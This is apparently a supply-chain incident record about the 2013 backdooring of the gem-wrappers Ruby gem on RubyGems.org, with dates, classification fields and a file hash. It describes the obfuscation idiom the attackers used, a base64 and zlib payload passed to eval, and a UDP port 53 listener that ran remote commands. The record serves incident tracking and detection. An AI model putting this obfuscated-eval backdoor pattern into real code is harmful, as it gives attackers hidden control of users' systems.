gem-wrappers
gem-wrappers gem backdoored during RubyGems.org platform compromise
During a platform-level compromise of RubyGems.org (exploiting server vulnerabilities), attackers gained root filesystem access and replaced the legitimate 'gem-wrappers' gem file (v1.1.0) with a malicious version. This trojaned version, with malicious code inserted into 'gemutils.rb', contained obfuscated code (using eval(Zlib::Inflate.inflate(Base64.decode64(...)))) that acted as a backdoor. The backdoor listened on UDP port 53, accepted clear text commands, and allowed remote command execution via eval() on systems that installed or updated to the compromised gem during the incident window.
- Date
- 2013-01-29 to 2013-02-01
- Category
- Open Source
- Target Surface
- Package registry
- Insertion Phase
- distribution
- Impact
- Backdoor
- Cause
- Compromised Infrastructure
What Was Affected
Package
gem-wrappers
LanguageRuby
ComponentLibrary
Artifact typesource archive
Domain typepackage host
Domain
rubygems.org
Repository
github.com/rvm/gem-wrappers
Compromised Versions
Incident Context
- Motive
- Unauthorized Access/Control
- Attribution
- Individual Hacker
- Transitive
- No
- Observed Duration
- 3 days
Evidence
Compromised Artifacts
Current Artifacts and Analysis
Indicators and Changes
Hashes
sha256:fbcf2be93426cbf4f1b2f03b7ac3a8fc85eedd6a8dd42b2f6355c388fed8e00e
Source Data
Source record: oss/gem-wrappers/meta.yaml